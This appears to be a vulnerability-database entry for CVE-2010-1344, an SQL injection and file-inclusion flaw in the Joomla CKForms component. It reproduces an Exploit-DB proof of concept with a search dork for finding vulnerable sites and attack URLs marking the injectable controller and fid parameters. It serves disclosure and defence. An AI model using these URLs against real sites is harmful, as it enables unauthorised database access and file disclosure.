CVE-2010-1344
Description
SQL injection vulnerability in the Cookex Agency CKForms (com_ckforms) component 1.3.3 for Joomla! allows remote attackers to execute arbitrary SQL commands via the fid parameter in a detail action to index.php.
Predictions
Heuristic predictions, AS-IS, for prioritization only.
Mitigations
No mitigations published for this CVE yet.
The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or โ if you've already worked around this in production โ publish your fix to the community-verified tier.
โ Propose a mitigation on Community โ Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here withsource_tier=community-verified.
Exploits
Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.
Exploit-DB
Joomla! Component com_ckforms - Multiple Vulnerabilities
####################################################################
>>>>> Author : altbta [l_9@hotmail.com<mailto:l_9@hotmail.com>]
>>>>> Home : www.v4-team.com/cc<http://www.v4-team.com/cc>
>>>>> Script : Joomla Component com_ckforms
>>>>> Bug Type : Multiple Vulnerabilities
>>>>> Dork : inurl:"com_ckforms"
####################################################################
===[ Exploit ]=== [LFI]
http://site/index.php?option=com_ckforms&controller=[LFI]
===[ Exploit ]=== [sql]
http://site/index.php?option=com_ckforms&controller=ckdata&view=ckformsdata&layout=detail&task=detail&fid=2[sql]
####################################################################
RxH & ab0-3th4b
Application impact
| Vendor | Product | Versions | Fixed |
|---|---|---|---|
| cookex | com_ckforms | 1.3.3 | |
| joomla | joomla\! | | |
References
- http://packetstormsecurity.org/1003-exploits/joomlackforms-lfisql.txt
- http://secunia.com/advisories/38976
- http://www.exploit-db.com/exploits/11785
- http://www.osvdb.org/63032
- http://www.securityfocus.com/bid/38785
- https://exchange.xforce.ibmcloud.com/vulnerabilities/56988
- http://packetstormsecurity.org/1003-exploits/joomlackforms-lfisql.txt
- http://secunia.com/advisories/38976
- http://www.exploit-db.com/exploits/11785
- http://www.osvdb.org/63032
- http://www.securityfocus.com/bid/38785
- https://exchange.xforce.ibmcloud.com/vulnerabilities/56988
CWEs
CWE-89
Community-verified mitigations for this CVE will appear above when contributors publish them.
Verify integrity in audit chain (admin only). AS-IS.